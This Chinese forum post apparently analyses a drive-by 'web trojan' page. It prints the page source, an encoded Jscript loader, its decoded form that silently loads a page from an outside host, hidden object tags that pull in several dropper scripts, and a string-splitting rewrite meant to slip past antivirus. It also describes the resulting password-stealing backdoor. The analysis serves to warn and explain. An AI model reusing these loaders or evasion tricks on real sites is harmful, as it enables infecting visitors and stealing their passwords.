最近窜所在各个网站之中，发现许多网址都挂了马，所以告诉大家，要小心这种远程控制木马，可xx偷你的隐私。作为黑客，每个人都有防御病毒木马的能力，但大同小异，以后会告诉大家防御方法。

下面是被挂马的网站，都批量挂马大家知道就行不要打开.为了防止种病毒我在网址种加“1”

,

这只是一部分最近许多网站都挂了这种木马？

现在就说一说网页木马攻击原理吧？

（下面提到的网址病毒代码以去掉请大家放心浏览）

注意：谨以此文章献给我的父亲和母亲，感谢他们对我多年来的养育之恩！本文由于部分代码涉及病毒分析，所以拷贝过程中，杀毒软件会把文章当病毒杀掉，并无任何大碍只是无法在有杀毒软件的计算机进行阅读或者传输。

拙笔正文：
本人不才，做一个小小的技术版主。有{yt}在论坛回帖的时候看见这样一部主题
我做的网页木马


不怕就去看看，呵呵！

回的人比较少，那这样吧，这种关键时刻，上刀山下油锅的就得是我们做版猪的了！习惯的看一下表凌晨4:08。
做好安全措施，冲到了
一看网页的源文件是

以下是代码:
<frameset rows="0,*" style="border-top-width: 0px; border-left-width: 0px; border-right-width: 0px">
<frame name=bar src=bar.htm noresize scrolling=no border=0 framespacing=0 frameborder=0 scrolling=no>
<frame src=http://kevjy.1816.net/1/ scrolling=auto name=main>
</frameset>

经过一段时间的分析踩点，得出来如下结论：
文件bar.htm没找到，不知道是真没有还是我菜，真没找到。
真的整个站的首页在这里：

其实实现木马病毒种植的是这个页：


那就从罪魁祸首开始分析

其页面代码如下：


以下是代码:
<script language="Jscript.Encode">#@~^8gAAAA==@#@&@!Z O,@#@&7lM~KD[/{JYf;W4NnmDPNmOC]2fu +tOOa]fbJ&tK:n bYN.2cmG:JV\%Hzs:R4Yss]y ~hkL4D]>PSkND4Y&GPZ]f2Yf;zG4NnmD]f3r@&0;U1YrW ~U+Og+SWMNkc#@& -lMPHnSWM[/p1+S GD9/{EU+d^mwn`qGD9/bI9Wm;hxORS.bYnv1hKD9d#p8@&?YHnSWM[/v#i@&&&P >
<head><meta content="text/html; charset=gb2312" http-equiv=Content-Type><meta content="Microsoft FrontPage 4.0" name=GENERATOR><LINK href="../../images/main.css" rel=stylesheet><title>八目妖整人城堡</title>
<style fprolloverstyle>A:hover {color: #FF0000}
</style>
<script language=javascript>
step=0
function flash_title()
{
step++
if (step==3) {step=1}
if (step==1) {document.title='☆★<a href='http://kev.369.com' target=_blank>http://kev.369.com</a>☆★→<a href='http://kev.369.com' target=_blank>http://kev.369.com</a> '}
if (step==2) {document.title='★☆<a href='http://kev.369.com' target=_blank>http://kev.369.com</a>★☆→<a href='http://kev.369.com' target=_blank>http://kev.369.com</a> '}
setTimeout("flash_title()",200);
}
flash_title()

</script>
<script LANGUAGE="javascript">            
<!--
vers = navigator.appVersion;
vers = parseFloat(vers.substring(vers.lastIndexOf(".")-1,vers.length));   
var c=1;
defaultStatus="<a href='http://kev.369.com' target=_blank>http://kev.369.com</a> ; 如果你喜欢本站,别忘了把本站的网址告诉给你QQ上的朋友哦!谢谢您！"
function bookmark() {
window.external.AddFavorite('<a href='http://kev.369.com'' target=_blank>http://kev.369.com'</a>, '我爱你');
}
//-->
</script>
</HEAD>
<BODY bgcolor="#CCFFCC" text="#006600" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<script language=javascript><!--// Hide the javascript from older browsers (window.alert(" 18岁以下禁止进入,请按确定")) // End hiding of script // --></script>

<script language=javascript><!--   
// Hide the javascript from older browsers   
(window.alert(" 你的系统严重出错！请关闭其他窗口！ "))   
// End hiding of script    
// --></script>

<script language=javascript><!--   
// Hide the javascript from older browsers   
(window.alert(" 你的系统严重出错！请关闭其他窗口！ "))   
// End hiding of script    
// --></script>

<script language=javascript><!--   
// Hide the javascript from older browsers   
(window.alert(" 你的系统严重出错！请关闭其他窗口！ "))   
// End hiding of script    
// --></script>

……
（中间省略N多象上面一样的弹出窗口废话）
……

<script language=javascript>   
<!-- Hide the javascript from older browsers   
(window.alert("因为你还有可能碰到类似的网页喔!"))   
// End hiding of script -->   
</script>

<script language=javascript><!--   
// Hide the javascript from older browsers   
(window.alert("你仔细想一想...不觉得有趣吗??"))   
// End hiding of script    
// --></script>

<script language=javascript><!--   
// Hide the javascript from older browsers   
(window.alert("好吧~我对不起你~你生命可以继续啦!!"))   
// End hiding of script    
// --></script>
<div align="center">
  <center>
<table border="0" cellpadding="0" cellspacing="0" width="750">
  <tr>
    <td height="20"></td>
    <td height="20"></td>
    <td height="20">
      <p></td> 
    <td height="20"></td>
  </tr>
  <tr>
    <td width="9%"></td>
    <td width="41%"></td>
    <td width="43%">
      <p align="right"><font color="#339966"> <b><<< </b><script language="javascript" src="../../favor.js"></script></font><b><font color="#339966">>>> </font></b></td>        
    <td width="7%"></td>     
  </tr>     
  <tr>
    <td width="{bfb}" colspan="4">
      <p align="center"><font size="6">哈哈，过瘾吧？</font> </p>
<P align=center><FONT color=#339966 face=Wingdings  
size=7>ABCDEFGHIMN<BR>&*(</FONT></P> 
<p align="center"><font size="4" face="Arial"><b>HeHe......Just a joke!</b></font></p> 
<p align="center"><font size="4" face="Arial"><b>Have FUN......</b></font></p> 
      <p align="center">　</td>
  </tr>    
</table>    
  </center>
</div>
</BODY>

哇好多弹出窗口啊？其实后面你就知道了，这其实不过是让他给你种木马争取时间：）黑吧！！
上面的代码其实有一小段代码十分可疑！应该大家也注意了。就是：


以下是代码:
<script language="Jscript.Encode">#@~^8gAAAA==@#@&@!Z O,@#@&7lM~KD[/{JYf;W4NnmDPNmOC]2fu +tOOa]fbJ&tK:n bYN.2cmG:JV\%Hzs:R4Yss]y ~hkL4D]>PSkND4Y&GPZ]f2Yf;zG4NnmD]f3r@&0;U1YrW ~U+Og+SWMNkc#@& -lMPHnSWM[/p1+S GD9/{EU+d^mwn`qGD9/bI9Wm;hxORS.bYnv1hKD9d#p8@&?YHnSWM[/v#i@&&&P ［/QUOTE">O@*@&IUsAAA==^#~@<／script>

很明显代码被微软的脚本编码器( SCRENC.EXE )加密过！简单介绍一下，微软的脚本编码器( SCRENC.EXE )是微软提供的可以对ASP脚本源码进行编码加密的一个工具。应用开发商通过使用这个工具，达到 Web 主机和 Web 客户不能查看或修改它们的源代码。具体信息可以查看中国暗域网络相关技术文章，这里就不说废话了！现在开始解密……
把秘密议文拷贝到一个TXT文件中，重命名为source.txt。然后找到ZwdEcode所在的目录，输入

以下是代码:
D:\Tools>zwdecode
Decoder for Microsoft script v6.2       
©2001 MrZhengwei ,  <a href="> TEL:013001865430 
Home page: <a href='http://www.zhengwei.net/prg/zwdecode.htm' target=_blank>http://www.zhengwei.net/prg/zwdecode.htm</a> ;  

Usage: zwdecode <infile> <outfile>

zwdecode source.txt hackway.txt

软件zwdecode下载地址：中国暗域网络技术下载系统
现在去同目录下看，可以找到hackway.txt，其中就是解密后的明文。使用ZWD轻易xx后的明文如下：

以下是代码:
<script language="Jscript.Encode">
<!--
var Words="%3Cobject data%3D%22http%3A//home.itdrp.com/kevjy/mm.html%22 weight%3D0 width%3D 0%3E%3C/object%3E"
function SetNewWords()
{var NewWords;NewWords=unescape(Words);document.write(NewWords);}
SetNewWords();
// -->
</script>

看见了xx后的明文，可以分析这里是个重点
http%3A//home.itdrp.com/kevjy/mm.html
%3A是编码后的内容，翻译过来就是t。那么我们现在清楚了，原来开始的时候还插入了一个mm.html页！
好！再去这里看看：
竟然是张白页？晕……而且无法查看源代码，点了“查看源文件”竟然没反应，连输入view-source都不可以，只好把它强行下载回来研究了。
一下回来竟然被杀毒软件杀掉了，看来这个页面最有问题了。关闭杀毒软件时实监控，再下一次。
OK！现在我们可以看见mm.html的内容如下：
前面的代码是这样的（被杀毒软件认成病毒的就是这里了，后面的xx就不说了，我懒……）：

以下是代码:

<html>
<body>
<object data="lhxyexe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta.asp" weight=0 width= 0 height="14"></object>
<object data="20cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqkev.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>

（以上的代码会被杀毒软件认成病毒，如果想保存此文章，请把上面的代码转换成下面的代码，书写方式变化而已）


以下是代码:

<html>
<body>
<object data="lhxy"+"exe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta.asp" weight=0 width= 0 height="14"></object>
<object data="20"+"cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqk"+"ev.asp" weight=0 width= 0 height="14"></object>
<object data="lhx"+"yexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>

可以看见上面的代码就知道问题所在了。经过检查lhxyexe.asp，并未对系统做什么动作。而20cn.asp等都是病毒文件（好狠毒啊）。均为脚本病毒js.htadropper的变种，这里私爱具体对他们尽心一一分析：
JS.HTADropper.b 不详，等待有识之士一起研究
JS.HTADropper.c 修改用户IE设置的恶意网页
JS.HTADropper.d 恶意网页的恶意脚本
JS.HTADropper.e 启动后是放出两个脚本病毒，具体放出了谁我就不清楚了，等待有识之士一起研究
JS.HTADropper.f 恶意网站释放的病毒。利用IE漏洞，释放木马病毒Trojan.PSW.PS-Client.enc，楼主一直说自己那个是网页木马，现在知道木马在哪里了吧：）
JS.HTADropper.gen 脚本病毒，作用不详，等待有识之士一起研究。还是自己问问那个站长吧。
现在来说说刚才JS.HTADropper.f放出来的小木马吧。
Trojan.PSW.PS-Client.enc其实是个后门程序，在后台隐藏运行。并修改注册表的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 项,在其中添加一项 键值以达到自启动的目的.窃取用户密码。
真是无“毒”不丈夫啊！！
小生佩服佩服……以上就是对网页木马的简单剖析，如有什么不对，还请高手斧正。
{zh1}说一点，其实木马还可以插得更加“神不知鬼不觉”，而且只要做小小的修改，

承让承让……